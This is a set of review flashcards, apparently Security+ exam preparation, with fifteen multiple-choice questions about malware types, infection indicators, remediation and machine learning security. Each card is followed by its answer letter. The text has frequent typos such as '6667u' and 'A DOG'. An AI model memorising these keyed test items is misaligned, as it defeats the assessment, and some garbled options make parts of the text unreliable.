Chapter 3 Review Flashcards
1
Q
1. Gurvinder has been asked to assist a company that recently fired on of their developers. After the dveloper was terminated, the critical application that they had writen for the organization stopped working and now displays a message reading "You shouldn't have fired me!" If the developer's access was terminated and the organization does not believe that they would had access to any system or code after they left the organization, what type of malware should Gurvinder look for ? A. A RAT B. A PUP C. A logic bomb D. A keylogger
A
C
2
Q
2. Naomi believes that an attacker has compromised a Windows workstation using a fileless malware package. what Windows scripting tool was most likely used to download and execute the malware? A. VBScript B. Python C. Bash D. PowerShell
A
D
3
Q
3. Scoot notices that one of the systems on his network contacted a number of system via encrypted web traffic, downloaded a handful of files, and then uploaded a large amount of data to a remote system. what type of infection should he look for? A. A keylogger B. A backdoor C. A bot D. A logic bomb
A
C
4
Q
4. Amanda notices traffic between her systems and a known malicious host on TCP port 6667u. what type of traffic is she most likely detecting? A. Command and control B. A hijacked web browser C. A RAT D. A worm
A
A
5
Q
5. Mike discovers that attackers have left software that allows them ot have remote access to systems on a computer in his company's network. How hsould he describe or classify this malware? A. A worm B. Crypto malware C. A trojan D. A backdoor
A
D
6
Q
- Naomi wants to provide guidance on how to keep her organization’s new machine learning tools secure. which of the following is not a common means of securing machine learning algorithms?
A. Understand the quality of the source data
B. Build a secure working environment for ML developers
C. Require third-part review for bias in ML algorithms
D. ensure changes to ML algorithms are reviewed and tested
A
C
7
Q
7. What type of malware is adware typically classified as? A. A DOG B. A backdoor C. A PUP D. A rootkit
A
C
8
Q
- Matt uploads a malware sample to a third-party malware scanning a site that uses multiple antimalware and antivirus engines to scan the sample. He receives several different answers for what the malware package is. what has occurred?
A. The package contains more than one piece of malware.
B. The service is misconfigured.
C. The malware is polymorphic and changed while being tested.
D. Different vendors use different names for malware packages.
A
D
9
Q
- Nancy is concerned that there is a software keylogger on the system she is investigating. What data may have been stolen?
A. All files on the system
B. All keyboard input
C. All files the user accessed while the keylogger was active
D. Keyboard and other input from the user
A
D
10
Q
10. Cyrpto malware is a type of what sort of malware? A. Worms B. PUP C. Ransomware D. Rootkit
A
C
11
Q
- Rick believes that a system he is responsible for has been compromised with malware that uses a rootkit to obtain and retain access to the system. When he runs a virus scan, the system doesn’t show any malware. If he has other data that indicates the system is infected, what should his next step be if he wants to determine what malware may be on the system?
A. Rerun the antimalware scan.
B. Mount the drive on another system and scan it that way.
C. Disable the systems antivirus because it may be causing a false negative.
D. The system is not infected and he should move on.
A
B
12
Q
- Tracy is concerned about attacks against the machine learning algorithm that her organization is using to assess their network. What step should she take to ensure that her baseline data is not tainted?
A. She should scan all systems on the network for vulnerabilities and remediate them before using the algorithm.
B. She should run the ML algorithm on the network only if she believes it is secure.
C. She should disable outbound and inbound network access so that only normal internal traffic is validated.
D. She should disable all firewall rules so that all potential traffic can be validated.
A
B
13
Q
- Selah wants to ensure that malware is completely removed from a system. what should she do to ensure this?
A. Run multiple antimalware tools and use them to remove all detections.
B. Wipe that drive and reinstall from known good media.
C. Use the delete setting in her antimalware software rather than the quarantine setting.
D. There is no way to ensure the system is safe and it should be destroyed.
A
B
14
Q
14. What type of malware is frequently called stalkerware because of its use by those in intimate relationships to spy on their partners? A. Worms B. RATs C. Crypto malware D. PUPs
A
B
15
Q
- Ben wants to analyze Python code that he believes may be malicious code written by an employee of his organization. what can he do to determine if the code is malicious?
A. Run a decompiler against it to allow him to read the code.
B. Open the file using a text editor to review the code.
C. Test the code using an antivirus tool.
D. Submit the Python code to a malware testing website.
A
B